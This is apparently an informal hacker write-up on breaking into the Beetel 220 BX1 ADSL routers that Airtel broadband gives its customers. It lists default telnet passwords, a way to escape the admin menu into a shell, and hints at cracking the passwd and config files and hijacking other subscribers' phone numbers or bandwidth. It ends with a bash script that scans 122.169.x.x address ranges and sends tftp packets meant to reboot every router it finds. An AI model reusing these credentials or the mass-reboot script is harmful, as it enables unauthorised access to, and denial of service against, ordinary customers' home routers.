Airtel BroadBand Vulnerable to wide range of Attacks.

Airtel BroadBand provides the users with "Beetel 220 BX1" ASDL2+ CPE
This product of beetel's has embedded linux (prolly some RTOS linux)
There are a varied number of services running on the system. I am going to explain how to HACK(!crack) into the box for FUN & Profit.

The box comes with default IP Gateway = 192.168.1.1
and ur machine takes up 192.168.1.2 IP address.

what you have to do is :-
telnet 192.168.1.1

now there are 3 usernames by default.
"admin"
"support"
"user"

and their default passwords are :-
USERNAME-------->PASSWORD
"admin" -------->password
"support"------->supportuser
"user"---------->normaluser

now You can log into the Machine.
There will be some changes wrt normal linux box. But its ok. Its nice.
there might be a menu like :

Note: If you have problem with Backspace key, please make sure you configure your terminal emulator settings. For instance, from HyperTerminal you would need to use File->Properties->Setting->Back Space key sends.

Main Menu

1. ADSL Link State
2. LAN
3. WAN
4. DNS Server
5. Route Setup
6. NAT
7. Firewall
8. Quality Of Service
9. Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
->

now this is one lame script ...U can exit (bypass) this script by typing "sh" command.
now u have an ~somewhat~ workable shell(konsole)

now type "help" u will get :-
Built-in commands:
-------------------
. : break cd continue eval exec exit export help login newgrp
read readonly set shift times trap umask wait [ busybox cat df
dmesg echo expr false ifconfig init insmod kill klogd linuxrc
logger logread mkdir mount msh ping ps pwd reboot rm rmmod route
sendarp sh sysinfo syslogd test tftp tftpd true tty vconfig

now u do ls /ls -a/ls -al ...mmmmmm it does not work ..shit ...what to do now ?

ls <--- does not work ...
so we will use an alternative "echo *" like in very old digital unix boxes which we had in college(kgp).

now on doing "echo *":-
# echo *
bin dev etc lib linuxrc mnt proc sbin usr var webs
#

ok now this seems a bit OK!! thank G0d(if exist any)...

next step ...do a ps -xa :))
# ps -xa
PID Uid VmSize Stat Command
1 admin 248 S init
2 admin SWN [ksoftirqd/0]
3 admin SW< [events/0]
4 admin SW< [khelper]
5 admin SW< [kblockd/0]
6 admin SW [pdflush]
7 admin SW [pdflush]
8 admin SW [kswapd0]
9 admin SW< [aio/0]
10 admin SW [mtdblockd]
17 admin 292 S -sh
35 admin 532 S cfm
121 admin 176 S pvc2684d
205 admin 212 S dhcpd
211 admin 280 S syslogd -C -l 7
212 admin 540 S telnetd
216 admin 148 S bftpd
219 admin 180 S tftpd
220 admin 648 S httpd
222 admin 216 S klogd
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040xxxxxxxxxxxx
274 admin 196 S /bin/dnsprobe
278 admin 268 S upnp -L br0 -W ppp_1_32_1 -D
339 admin 600 S telnetd
340 admin 264 S sh -c sh
341 admin 304 S sh
345 admin 248 R ps -xa
#
HOLY SHIT .... SO MANY process running in this small b0x :-P
now what processor does it have :-O
lets check ....
# cd /proc
# echo *
1 10 121 17 2 205 211 212 216 219 220 222 226 274 278 286 3 339 340 341 35 4 5 6 7 8 9 buddyinfo bus cmdline cpuinfo devices diskstats driver execdomains filesystems fs interrupts iomem ioports irq kcore kmsg loadavg locks meminfo misc modules mounts mtd net partitions self slabinfo stat sys sysvipc tty uptime var version vmstat

# cat cpuinfo
system type : 96338L-2M-8M
processor : 0
cpu model : BCM6338 V1.0
BogoMIPS : 235.52
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : yes
hardware watchpoint : no
VCED exceptions : not available
VCEI exceptions : not available
#

hmmmmmmm ........
# cat meminfo
MemTotal: 6164 kB
MemFree: 520 kB
Buffers: 80 kB
Cached: 1144 kB
SwapCached: 0 kB
Active: 2172 kB
Inactive: 112 kB
HighTotal: 0 kB
HighFree: 0 kB
LowTotal: 6164 kB
LowFree: 520 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 0 kB
Writeback: 0 kB
Mapped: 2036 kB
Slab: 2104 kB
Committed_AS: 2916 kB
PageTables: 304 kB
VmallocTotal: 1048560 kB
VmallocUsed: 688 kB
VmallocChunk: 1047836 kB
#


man this box is such a bottleneck ... :(( [may be this is why my net is always so slow :p]

# cat /etc/issue
cat: /etc/issue: No such file or directory
#
hmmmmmm.... it doesn't ...what to do ....
# cat /proc/version
Linux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Fri Dec 23 09:56:55 CST 2005
#
hmmm .............
gcc :)) well i think i can have phun ..... :)) =)) >:) \:D/ <:-p
# gcc
gcc: not found
# cc
cc: not found
#

:(( guess not .... :(( shit ..f*** a$$h**** ... now what fun is linux without gcc ...
may be that's the reason they had ...2 make us not have phun :P ...well fu** them ... we will still have phun .... :D


121 admin 176 S pvc2684d
205 admin 212 S dhcpd
211 admin 280 S syslogd -C -l 7
212 admin 540 S telnetd
216 admin 148 S bftpd
219 admin 180 S tftpd
220 admin 648 S httpd
222 admin 216 S klogd
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040XXXXXX <--- (X)
274 admin 196 S /bin/dnsprobe
278 admin 268 S upnp -L br0 -W ppp_1_32_1 -D
339 admin 600 S telnetd
340 admin 264 S sh -c sh
341 admin 308 S sh
355 admin 248 R ps -xa


(X) == UR PHONE NUMBER (040400XXXXX)
NOW ...
the servers running on the box are of interest .........
httpd, tftpd, bftpd, telnetd.....

now what ....
well we will start fuzzing .....these daemons.... lets see what's the output ...
[I will just give and example with tftpd... an source of a client is attached with it+ a simple tiny miny winnie script which scans the Class B network and reboots the boxes :-P )
........ [this is how u can have fun ...ppl who know the VA process know what to do next ]


Hey check out /etc directory .....
few cool files there ... like passwd, default.cfg ....etc etc ...
default.cfg has base64 encoded password which is used when the box is RSTed....
and passwd file can be cracked open by john in 1 min ...
try those ....
check out all those files which might give some info about the boxx ... now that's Hacking :)
ok ... now something NICE ... ok naa ????


now what is this ...
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040XXXXXX
well u tell me :)
now its a daemon which is using ur phone number ... [:o why so ]
WHO Knows ... I am not going to give u anymore answers... OTHERWISE I will be JAILED[:o hooooaaa ...wtf ...yes ...Since there are LAWs In INDIA now ... ;)
but what if ...i cange the phone number .... what can i get :-P
who knows ... may be u can hijack phones or may be u can get the same speed of that user to whom the phone belongs .... who knows ...
if u want to find out ..please go ahead .... do iton ur own ...
I wish u best of luck ....and happy hacking :D


===== CODE =====
#!/bin/bash

var0=1
LIMIT=255
var1=1


while [ "$var1" -lt "$LIMIT" ]
do
var1=`expr $var1 + 1`
state=`nmap -sP -T Insane 122.169.$var1.1 | grep up | cut -d '(' -f2 | cut -d '.' -f1-3 | grep hosts | cut -d ' ' -f1 | wc -l`

if [ $state -eq 0 ]
then
echo -ne "Sending Packet to $1.$var1 Network Segment\n"
while [ "$var0" -lt "$LIMIT" ]
do
var0=`expr $var0 + 1` # var0=$(($var0+1)) also works.
# var0=$((var0 + 1)) also works.
# let "var0 += 1" also works.
if [ $var0 -ne 159 ] #159 is my ipaddr so to not boot mine
then
./tftp $1.$var1.$var0 69 S a > /dev/null 2>&1 &
fi
done # Various other methods also work.
sleep 5s
fi
done

echo
exit 0

===== END of CODE ======
./tftp == STANDARD TFTP CLIENT